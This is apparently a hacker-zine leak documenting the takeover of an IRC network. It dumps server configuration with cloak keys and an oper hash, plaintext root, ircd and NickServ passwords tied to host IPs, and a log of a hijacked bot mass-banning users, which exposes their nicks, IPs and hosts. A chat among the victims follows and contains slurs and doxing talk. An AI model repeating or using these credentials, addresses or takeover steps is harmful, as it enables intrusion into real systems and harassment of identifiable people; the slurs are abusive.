"*[*-*]*"; +█ reason "Nickname not allowed"; +█ }; +█ +█ ban nick { +█ mask "zyk-*"; +█ reason "Nickname not allowed"; +█ }; +█ +█ ban realname { +█ mask "Swat Team"; +█ reason "mIRKFORCE"; +█ }; +█ +█ set { +█ network-name "ProjectInsecurity"; +█ default-server "irc.insecurity.zone"; +█ services-server "services.undernix.net"; +█ stats-server "stats.undernix.net"; +█ help-channel "#help"; +█ hiddenhost-prefix "boats"; +█ snomask-on-oper "+xwipIHWgs"; +█ +█ cloak-keys { +█ "ADXq2XNBW2NQXDP1kd6G2U1q7ph2HG5ZTK0E2wqLa"; +█ 
"DoF9BXfSkTzKobCQu8vwzWpzZbpm1VquxJpNTvORa"; +█ "hhkOmc3q1ik0sC0bT349zOnnU35xrSK1GEHLzC5Sa"; +█ }; +█ +█ hosts { +█ local "insecurity.zone"; +█ global "insecurity.zone"; +█ coadmin "insecurity.zone"; +█ admin "insecurity.zone"; +█ servicesadmin "insecurity.zone"; +█ netadmin "insecurity.zone"; +█ host-on-oper-up "yes"; +█ }; +█ }; +█ +█ set { +█ kline-address "careless@fuckyou.com"; +█ modes-on-connect "+ixw"; +█ modes-on-oper "+xwipIHWgs"; +█ oper-auto-join "#operators"; +█ options { +█ hide-ulines; +█ show-connect-info; +█ }; +█ maxchannelsperuser 20; +█ restrict-usermodes "s"; +█ oper-only-stats "*"; +█ throttle { +█ connections 7; +█ period 60s; +█ }; +█ anti-flood { +█ nick-flood 5:30; +█ }; +█ }; +█ +█ allow { +█ ip *@*; +█ hostname *@*; +█ class clients; +█ maxperip 9; +█ }; +█ +█ alias { type services; }; +█ alias ChanServ { type services; }; +█ alias OperServ { type services; }; +█ alias HelpServ { type services; }; +█ +█ @ret2libc (MLT): First off, I haven't even implemented MD5 anywhere. +█ Secondly, please show me evidence of collisions being actively abused in the +█ wild. +█ +█ Is true MLT plaintext != MD5. But maybe we checking the hub config next. +█ root@zyzz8:~# ./unr34l-p1v0t superb.underunix.net +█ oper MLT { +█ class clients; +█ from { +█ userhost *@*; +█ }; +█ password "$eIU5EWKz$juoBabw3RQrdYZYzW/7f2A=="{ md5; }; +█ flags +█ { +█ netadmin; +█ global; +█ can_rehash; +█ +█ This looking like MD5 to me. +█ Okay bongrip, is time to get your priv8 root password.. +█ +█ host = ip-41-230-239-173.toronto.ca.northamericancoax.com : username = ins3c +█ ircd : password = gangster4lyf +█ host = 198.15.79.157 : username = root : password = h3ll0p00p6654 +█ +█ root:h3ll0p00p6654 +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x05 A flaw in MD5 ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ We'll let bongrip describe his bot for us. 
Keep in mind there is a bot on +█ their network that allowing you to change your vhost. +█ +█ bongrip == rebel/defiler/dope/n0de9 (IPT/BlueHell) +█ danK == django +█ +█ do not try to exploit django, u will get glined +█ its all automated +█ it identifies by nick/ident/host +█ +█ !vhost insecurity.zone +█ * vHostserv sets ban on MLT|afk!*@* +█ * You have been kicked from #vhost by vHostserv (Done. You can request a new +█ vhost after 1 seconds from your last one. Banned for 1 seconds) +█ +█ By the way, is still 0day'd, they never figuring it out. Their best guess +█ being we either made a 0day driveby browser exploit or cracked a 63 +█ character m1x3d alphanumeric MD5 hash with symb0ls. +█ +█ Which would take 4,109,550,000,000,000,000,000,000,000,000,000,000,000,000, +█ 000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000, +█ 000,000 years for our cluster of 200 GTX1080's to crack. The heat death of +█ universe would happening first, but skids not thinking that far. +█ +█ * Now talking on #priv8 +█ * Topic for #priv8 is: SuPeR SeCrEt +█ * Topic for #priv8 set by MLT (Sun Jun 4 08:33:14 2017) +█ * danK sets mode +a on #priv8 MLT +█ * danK gives channel operator status to MLT +█ OPER OVERRIDE: danK +█ (POTENT@ec2-34-210-28-112.us-west-2.compute.amazonaws.com) MODE #priv8 +ao +█ MLT MLT +█ .gline dirty +█ Added gline for dirty r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ dirty!dirty@crownemirates.bid (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline fuzion +█ Added gline for fuzion r.i.p +█ .gline fuzi0n +█ Added gline for fuzi0n r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ FuZi0N!FuZi0N@162.248.73.100 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline lola +█ Added gline for lola r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ lola!lola@zyzz10.isla.moe (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at 
fsociety.internetz.me: +█ catsik!catsik@zyzz10.isla.moe (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline RMS +█ Added gline for RMS r.i.p +█ (User) exiting : at fsociety.internetz.me: RMS!r1ch4rd@91.92.136.64 +█ (User has been permanently banned from internetz.me +█ (no reason)) +█ .gline Nux +█ Added gline for Nux r.i.p +█ (User) exiting : at fsociety.internetz.me: Nux!nux@skidstain.com +█ (User has been permanently banned from internetz.me +█ (no reason)) +█ .gline syn4pse +█ Added gline for syn4pse r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ loeken!loeken@u.internetz.me (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ syn4pse!syn@u.internetz.me (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ [internetz|me|u]!ime@u.internetz.me (User has been permanently banned +█ from internetz.me (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ syn4pse-!syninsec@u.internetz.me (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline sxcurity +█ Added gline for sxcurity r.i.p +█ (User) exiting : at aussie.insecurity.zone: sxcurity!sxC@nullptr.cz +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ (User) exiting : at fsociety.internetz.me: bongrip_!a@nullptr.cz +█ (User has been permanently banned from internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: dab!2POTENT@nullptr.cz +█ (User has been permanently banned from internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: Zodiac!Zodiac@nullptr.cz +█ (User has been permanently banned from internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: bongrip-!a@nullptr.cz +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline sniger +█ Added gline for sniger r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ 
sniger!sniger@45.32.162.220 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ danC3!danC2@45.32.162.220 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline tables +█ Added gline for tables r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ tables!tables@5.79.86.15 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Bansh +█ (User) connecting : at fsociety.internetz.me: loeken +█ (loeken@p5DDC2C31.dip0.t-ipconnect.de) +█ Added gline for Bansh r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Bansh!r00t@tor.thd.ninja (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) connecting : at aussie.insecurity.zone: tables +█ (tables@marylou.nos-oignons.net) +█ NickServ: tables!tables@marylou.nos-oignons.net identified for nick +█ tables. +█ .gline Derp +█ Added gline for Derp r.i.p +█ (User) exiting : at aussie.insecurity.zone: Derp!Derp@194.88.143.66 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline vein +█ Added gline for vein r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ vein!Amaterasu@ec2-52-42-196-254.us-west-2.compute.amazonaws.com +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline dab +█ Added gline for dab r.i.p +█ .gline FSB +█ Sorry komrade +█ Added gline for FSB r.i.p +█ (User) connecting : at aussie.insecurity.zone: Derp +█ (Derp@tor00.telenet.unc.edu) +█ (User) exiting : at aussie.insecurity.zone: FSB!efSB@95.215.47.208 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline Alyssa +█ Added gline for Alyssa r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ skooch!sid3163@brockwell.irccloud.com (User has been permanently banned +█ frominternetz.me (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ Alyssa!sid226984@brockwell.irccloud.com (User has been permanently banned +█ from 
ProjectInsecurity (no reason)) +█ .gline peanuter +█ Added gline for peanuter r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ peanuter!peanuter@80.82.77.240 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline ma0u +█ Added gline for ma0u r.i.p +█ (User) exiting : at fsociety.internetz.me: ma0u!fr0zn@45.63.41.227 +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline anniesbbs +█ Added gline for anniesbbs r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ anniesbbs!anniesbbs@185.21.216.195 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline dyingbreed +█ GLOBAL OPS: -- from OperServ: loeken is now an IRC operator. +█ Added gline for dyingbreed r.i.p +█ (User) connecting : at aussie.insecurity.zone: dirty +█ (dirty@tor00.telenet.unc.edu) +█ (User) exiting : dyingbreed (x@0s3x.internetz.me) [User has been +█ permanently banned from HackTimes (no reason)] +█ (User) exiting : at fsociety.internetz.me: +█ Southern_B|tch!NoneYa@0s3x.internetz.me (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline loeken +█ Added gline for loeken r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ loeken!loeken@p5DDC2C31.dip0.t-ipconnect.de (User has been permanently +█ banned from internetz.me (no reason)) +█ .gline dirty +█ Added gline for dirty r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Derp!Derp@tor00.telenet.unc.edu (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ dirty!dirty@tor00.telenet.unc.edu (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline ShadowBrokers +█ Added gline for ShadowBrokers r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ ShadowBrokers!root@afainatl.com (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline trentmicro +█ Added gline for trentmicro r.i.p +█ (User) exiting : at 
aussie.insecurity.zone: +█ trentmicro!kayla@204.44.91.24 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) connecting : at fsociety.internetz.me: Bansh +█ (r00t@163.172.217.50) +█ (User) exiting : at fsociety.internetz.me: +█ Bansh!r00t@163.172.217.50 (User is permanently banned (Tor exit server +█ detected. See www.sectoor.de/tor.php?ip=163.172.217.50)) +█ .gline xamfp +█ Added gline for xamfp r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ xamfp!xamfp@ec2-52-15-197-60.us-east-2.compute.amazonaws.com (User +█ has been permanently banned from internetz.me (no reason)) +█ .gline skooch +█ Added gline for skooch r.i.p +█ .gline cSmith +█ Added gline for cSmith r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ cSmith!csmith@cynical.us (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline deeboi +█ Added gline for deeboi r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ deeboi!deeboi@144.217.215.125 (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline Darkness +█ Added gline for Darkness r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ Darkness!Darkness@185.153.198.117 (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline nill +█ Added gline for nill r.i.p +█ (User) exiting : at fsociety.internetz.me: nill!n@198.251.80.206 +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline mr_vile +█ Added gline for mr_vile r.i.p +█ (User) exiting : at fsociety.internetz.me: mr_vile!no@i.dontexi.st +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline kurobeats +█ Added gline for kurobeats r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ kurobeats!Got@CPE-121-215-138-162.lnse1.wel.bigpond.net.au (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline Derp +█ Added gline for Derp r.i.p +█ .gline FlappyCuck +█ Added gline for FlappyCuck r.i.p +█ (User) exiting : at 
fsociety.internetz.me: +█ FlappyCuck!frinks@192.240.127.83 (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ smurgle!frinks@192.240.127.83 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline scope +█ Added gline for scope r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ scope!deploy@ip180.ip-193-70-95.eu (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Nux_ +█ Added gline for Nux_ r.i.p +█ (User) exiting : at fsociety.internetz.me: Nux_!nux@45.76.37.141 +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline v1tal +█ Added gline for v1tal r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ v1tal!buddy@bitcoinshell.mooo.com (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline Teridax +█ Added gline for Teridax r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ Teridax!Teridax@teridax.com (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline noproto +█ Added gline for noproto r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ noproto!noproto@104.236.220.65 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline w0ne +█ Added gline for w0ne r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ w0ne!w0ne@ec2-35-163-190-224.us-west-2.compute.amazonaws.com (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline AHyGjl76Jhf53 +█ Added gline for AHyGjl76Jhf53 r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ AHyGjl76Jhf53!AHyGjl76Jh@141.132.250.13 (User has been permanently banned +█ from ProjectInsecurity (no reason)) +█ .gline catsik +█ Added gline for catsik r.i.p +█ .gline Glaive +█ Added gline for Glaive r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ Glaive!Glaive@c-24-15-237-161.hsd1.il.comcast.net (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline didi_ +█ Added 
gline for didi_ r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ didi_!anona@82.192.95.120 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline tatootian +█ Added gline for tatootian r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ tatootian!p@ns501141.ip-192-99-5.net (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline eight_bytes +█ Added gline for eight_bytes r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ eight_bytes!sid141403@192.184.10.9 (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline psycho +█ Added gline for psycho r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ psycho!psycho@hammetjus.nl (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline icyphox +█ Added gline for icyphox r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ icyphox!icyphox@45.32.112.198 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Salam +█ Added gline for Salam r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Salam!ric0@23.239.80.28 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ n0rdi!ric0@23.239.80.28 (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) connecting : at fsociety.internetz.me: synk +█ (loeken@eu.fr1.cdn.internetz.me) +█ .gline rek +█ Added gline for rek r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ rek!r_e_k@46.102.152.118 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline pop +█ Added gline for pop r.i.p +█ .gline synk +█ (User) exiting : at aussie.insecurity.zone: +█ pop!lol@blackhat.cat (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ Added gline for synk r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ synk!loeken@eu.fr1.cdn.internetz.me (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline 
syn4pse- +█ Added gline for syn4pse- r.i.p +█ (User) connecting : at aussie.insecurity.zone: NS-DonaldL +█ (NS-DonaldL@ip-90-2-52-196.nyc.us.northamericancoax.com) +█ .gline smurgle +█ Added gline for smurgle r.i.p +█ .gline NS-DonaldL +█ Added gline for NS-DonaldL r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ NS-DonaldL!NS-DonaldL@ip-90-2-52-196.nyc.us.northamericancoax.com +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline rqu1_ +█ Added gline for rqu1_ r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ rqu1!r@216.218.222.12 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ rqu1_!r@216.218.222.12 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Zodiac +█ (User) connecting : at aussie.insecurity.zone: rqu1 +█ (r@163.172.212.115) +█ Added gline for Zodiac r.i.p +█ (User) connecting : at aussie.insecurity.zone: rqu1_ +█ (r@163.172.212.115) +█ .gline rqu1_ +█ Added gline for rqu1_ r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ rqu1!r@163.172.212.115 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ rqu1_!r@163.172.212.115 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Southern_B|tch +█ Added gline for Southern_B|tch r.i.p +█ .gline BrownDowntown +█ Added gline for BrownDowntown r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ BrownDowntown!bdt@212.92.104.143 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Conflict +█ Added gline for Conflict r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ Conflict!Conflict@185.10.68.229 (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ hipphopp!n@185.10.68.229 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline sipa +█ Added 
gline for sipa r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ sipa!sipa@dsl-trebng11-54f90b-135.dhcp.inet.fi (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline thom +█ Added gline for thom r.i.p +█ (User) exiting : at fsociety.internetz.me: thom!xD@haxx.pw (User +█ has been permanently banned from internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: lilwiz!lilwiz@haxx.pw +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline krazed +█ Added gline for krazed r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ krazed!admin@bigballs.club (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline lola +█ Added gline for lola r.i.p +█ .gline ald0g +█ Added gline for ald0g r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ ald0g!root@prawksi.relay.coldhak.com (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline installgen2 +█ Added gline for installgen2 r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ installgen2!installgen@gen2.space (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline pezzer +█ Added gline for pezzer r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ pezzer!pezzer@144.202.228.211 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) connecting : at aussie.insecurity.zone: ald0g +█ (root@185.170.41.8) +█ .gline ald0g +█ Added gline for ald0g r.i.p +█ (User) exiting : at aussie.insecurity.zone: ald0g!root@185.170.41.8 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline gibbz +█ Added gline for gibbz r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ gibbz!gibby@69.150.188.35.bc.googleusercontent.com (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline Glaive +█ (User) connecting : at fsociety.internetz.me: loeken +█ (loeken@eu.fr2.cdn.internetz.me) +█ Added gline for Glaive r.i.p +█ .gline 
loeken +█ Added gline for loeken r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ loeken!loeken@eu.fr2.cdn.internetz.me (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline sxcurity +█ Added gline for sxcurity r.i.p +█ .gline Jaq +█ Added gline for Jaq r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Jaq!No@pD952AAED.dip0.t-ipconnect.de (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline tables +█ Added gline for tables r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ tables!tables@marylou.nos-oignons.net (User has been permanently banned +█ from ProjectInsecurity (no reason)) +█ .gline c12 +█ Added gline for c12 r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ c12!c12@politkovskaja.torservers.net (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline herpez +█ Added gline for herpez r.i.p +█ (User) connecting : at aussie.insecurity.zone: notroot +█ (toor@45.63.16.220) +█ (User) connecting : at aussie.insecurity.zone: c12 +█ (c12@91.223.82.156) +█ .gline Withers +█ Added gline for Withers r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Withers!YUL@46.101.54.55 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline c12 +█ Added gline for c12 r.i.p +█ (User) exiting : at aussie.insecurity.zone: c12!c12@91.223.82.156 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline integrity +█ Added gline for integrity r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ integrity!hello@gay-nigger-hitler.club (User has been permanently banned +█ from ProjectInsecurity (no reason)) +█ (User) connecting : at aussie.insecurity.zone: ma0u +█ (umom@69.42.217.130) +█ .gline ma0u +█ Added gline for ma0u r.i.p +█ (User) exiting : at aussie.insecurity.zone: ma0u!umom@69.42.217.130 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ (User) connecting : at aussie.insecurity.zone: tables +█ 
(tables@93.174.93.133) +█ NickServ: tables!tables@93.174.93.133 identified for nick tables. +█ .gline tables +█ Added gline for tables r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ tables!tables@93.174.93.133 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .join #priv9 +█ Joining #priv9. +█ OPER OVERRIDE: danK +█ (POTENT@ec2-34-210-28-112.us-west-2.compute.amazonaws.com) MODE #priv9 +█ +ao MLT MLT +█ ;) +█ * danK has quit (aussie.insecurity.zone superb.undernix.net) +█ * bongrip has quit (aussie.insecurity.zone superb.undernix.net) +█ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ +█ * You are now known as NickServ +█ identify ISFATGtrajgvLix4b3hzNzdoMjU1MWB7X2p4!!@Lkkj8/.,xoxs77h2551`{_ +█ jx +█ ->MLT<- Password accepted, you are now recognized. +█ IDENTIFY fuckyehbr0 +█ ->bongrip-<- Password accepted, you are now recognized. +█ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ +█ хихихи +█ +█ how is it even happening tho?? lol +█ like this all began with defilers bot +█ i understand how that happened +█ the first time +█ but +█ i changed my pass +█ for nickserv +█ did 'MLT' ask you or defiler for a new oper pass in the past few days? +█ ffs just use a fuckin bnc +█ and be done with it +█ yeah but how the fuck do they have my ns pass +█ and get of that faggot webthing +█ lol are none of the boxes pwned +█ I'm pretty sure one of the boxes must be pwned +█ Just going to drop this here.. +█ identify MLT ISFATGtrajgvLix4b3hzNzdoMjU1MWB7X2p4!!@Lkkj8/. +█ ,xoxs77h2551`{_jx +█ ->MLT<- Password accepted, you are now recognized. 
+█ and its not lola's he wioped everything +█ rofl yep +█ -!- NickServ [NickServ@privacy.internetz.me-F6EB07AA.east.us.northamericanco +█ ax.com] has quit [User has been permanently banned from internetz.me (...)] +█ wow +█ WTF +█ so um +█ yours or defilers box == pwned +█ I'm guessing +█ lola did a full wipe on all of his shit +█ and i don't even know if its re-linked +█ Can someone pls pm me their jid? So i dont have to bother if things +█ get even worse +█ if anyone comes on here as me just tell them to post on @insecurity +█ but clearly one of the boxes is pwned, lol +█ post on it now +█ just get a bnc +█ keep the bnc online +█ ok sec +█ and dont use that fuckin webchat +█ doesn't matter +█ if they have all ns passes.. +█ waiting for your tweet :P +█ if one of ur boxes is pwned then what difference does that make +█ tweeted +█ tweet "FuZi0N is gawd" +█ i just tweeted 'h' +█ I'll most likely change it +█ https://twitter.com/insecurity?lang=en +█ ahh +█ yes +█ lang=en +█ someone has one of the boxes hooked and i don't think it can be lola's +█ (he wiped everything because defiler asked me to) +█ doxed bro +█ ooo sheiiit +█ hmm +█ .a +█ mgay +█ -!- like_our_danK_0day [NickServ@privacy.internetz.me-E8E7395.fr.amsterdamre +█ sidential.com] has joined #insecurity +█ So this happens if you stuff all hackers into one irc +█ i need assistance, how do i get a CVE? +█ Look at exploit-db +█ -!- like_our_danK_0day [NickServ@privacy.internetz.me-E8E7395.fr.amsterdamre +█ sidential.com] has quit [Killed (MLT (kys obese antifa furry retard lmfao))] +█ yeah syn4pse- +█ services are owned +█ it would seem.. 
+█ -!- ChanServ [services@undernix.net] has joined #insecurity +█ -!- mode/#insecurity [+ao ChanServ ChanServ] by ChanServ +█ -!- mode/#insecurity [+rQ] by ChanServ +█ -!- ChanServ changed the topic of #insecurity to: .ProjectInsecurity || Gene +█ ral tech-talk (keep it clean in here) || https://insecurity.zone/ || To enqu +█ ire about joining our core team, then /query MLT || Join #barstool for chats +█ on fleek. +█ so my use of client wont rly make much of a difference if they got all +█ ur ns passes anyway lol +█ Can we unsafe login now? +█ MLT +█ u got rekt +█ m8 +█ ur pw to ur login +█ <&FuZi0N> this is the insecurity zone guys +█ At least he has choosen a safe password +█ password1 ? +█ its not robbie +█ bongrip-: my pw was 60+ chars +█ (22:53:36) &MLT: .gline tables +█ (22:53:36) danK: Added gline for tables r.i.p +█ (22:53:36) danK: (User) exiting : at aussie.insecurity.zone: tabl +█ es!tables@ (User has been permanently banned from ProjectInsecurity (no reas +█ on)) +█ (22:55:23) &MLT: .sajoin +█ (22:55:25) &MLT: .join +█ (22:55:25) danK: Improper syntax. [Ex: !j <#chan>] +█ (22:55:30) &MLT: .join #priv9 +█ (22:55:30) danK: Joining #priv9. +█ (22:55:33) danK: OPER OVERRIDE: danK (POTENT@) MODE #priv9 +ao ML +█ T MLT +█ (22:55:42) &MLT: ;) +█ and used symbols etc +█ ya +█ someone got ur +█ pw +█ then +█ nothing is hacked +█ services == owned +█ no +█ services arent owned +█ so they just +█ they authed under you +█ magicked a 60+ char pw that ive never used for anything else +█ just you lel +█ they opered on you +█ outta nowhere? +█ they cracked hash bro +█ the md5 +█ idk whats going on man +█ idk how they got u +█ so how'd they get the d5 +█ but they got u +█ md5** +█ to begin with <- Wait. I thought you didn't use MD5? 
+█ i dont think they ever got it tbh cause noboxes are compromised +█ on my end +█ they simply identified as you +█ and glined with dank +█ ok so they didnt get oper +█ they didnt oper up +█ i changed that pass +█ today +█ i set that pw today +█ yea well +█ and somehow they have the new one +█ someone got ur ident pass +█ that's 60+ chars +█ cause u /msg'd nickserv +█ how does that work lol +█ on day +█ one day +█ time to reinstall winblows :p +█ lmao +█ Lol +█ did you click on any fancy links lately :p +█ musta been when services were gone +█ someone /nicked nickserv +█ got ur pass +█ ya probably, i am running windows lmao +█ He msgd an user +█ u may never have changed it +█ but +█ someone definitely got ur pw +█ i changed it todaya +█ this morning +█ <&FuZi0N> FYI never do /msg nickserv use /nickserv instead +█ because someone was on my acc yesterday +█ then they got my new pass +█ ya i use //ns +█ i use the alias +█ given +█ ya i should have did //ns lol +█ rookie mistake +█ tbh +█ Lol +█ <&FuZi0N> MLT ain't no rookie +█ <&FuZi0N> he's a phenom +█ Lol +█ hrm +█ fucking +█ syn4pse- deleted my oper lol +█ cause dank was on it +█ and someone was going ham on ur account +█ <&FuZi0N> yeah +█ through your bot +█ yea but +█ <&FuZi0N> seperate dank and your olines +█ they identified +█ to mlt +█ congrats +█ <&FuZi0N> so we can isolate the issue next time +█ once again team effort +█ lol +█ i mean lets look at the beginning entrance +█ are u sure they haven't got another bug in dank?? +█ nope +█ positive +█ 100% +█ are u sanitizing everything now? or did u just sanitize UD? +█ ah ok +█ i loked at #noc +█ they made dank join #priv9 +█ and glined more ppl +█ <&FuZi0N> hahah +█ Loooooooo8888888 +█ !user list +█ fuck +█ so to sum it up +█ <&FuZi0N> but when i did .pwn mlt how were they still able to access dank? +█ im the only oper who didnt fuck up compltely? 
